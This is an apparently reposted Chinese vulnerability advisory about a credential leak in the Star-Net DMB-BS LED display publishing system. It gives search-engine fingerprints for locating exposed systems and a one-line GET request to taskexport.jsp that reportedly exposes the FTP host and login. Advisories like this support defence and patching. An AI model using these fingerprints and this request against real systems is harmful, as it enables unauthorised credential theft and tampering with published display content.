当前位置: 首页 > article >正文

星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露

星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露

漏洞描述

福建星网锐捷通讯股份有限公司成立于2000年,公司秉承“融合创新科技,构建智慧未来"的经营理念,是国内领先的ICT基础设施及AI应用方案提供商。星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露,攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码,通过 FTP 可篡改 LED 发布信息

威胁等级: 中危

漏洞分类: 账号密码泄露

涉及厂商及产品:星网锐捷 DMB-BS : LED屏信息发布系统

应用指纹

指纹检出思路

fofa:app="STAR_NET-数字标牌系统"

icon:icon_hash="-260118452"

title:"-Welcome! -- BS3.2.02.38447-"

漏洞复现

GET /dmb/out/taskexport.jsp?taskcode HTTP/1.1


http://www.kler.cn/a/537833.html

相关文章:

  • mybatis 是否支持延迟加载?延迟加载的原理是什么?
  • 网络安全:挑战、技术与未来发展
  • Jupyter Notebook自动保存失败等问题的解决
  • apisix的real-ip插件使用说明
  • [渗透测试]热门搜索引擎推荐— — shodan篇
  • 索引失效的场景
  • 机器学习专业毕业设计选题灵感集锦:选题建议
  • C++STL(四)——vector模拟
  • Web自动化测试:如何生成高质量的测试报告
  • Element UI 表单源码原理
  • (六)C++的函数模板与类模板
  • 使用 Nginx 搭建代理服务器(正向代理 HTTPS 网站)指南
  • LVSNAT服务搭建
  • 2024最新版Java学习路线图--Java语言进阶重点知识
  • 【Ubuntu】安装和使用Ollama的报错处理集合
  • AGP8 混淆打包,反射实例化启动闪退
  • 识别市场动态:ADX趋势指标如何提升你的交易决策?
  • 核显是什么
  • 自动驾驶---E2E架构演进
  • 罗德与施瓦茨OSP220,OSP230开放式开关/射频开关/继电器测试
  • HTML之table表格学习
  • dijkstra算法类型题解
  • Vmware网络模式
  • uniapp mqttjs 小程序开发
  • 牛客网Java面试题及答案整理(2023年秋招最新版,持续更新)
  • 【信息系统项目管理师-案例真题】2017上半年案例分析答案和详解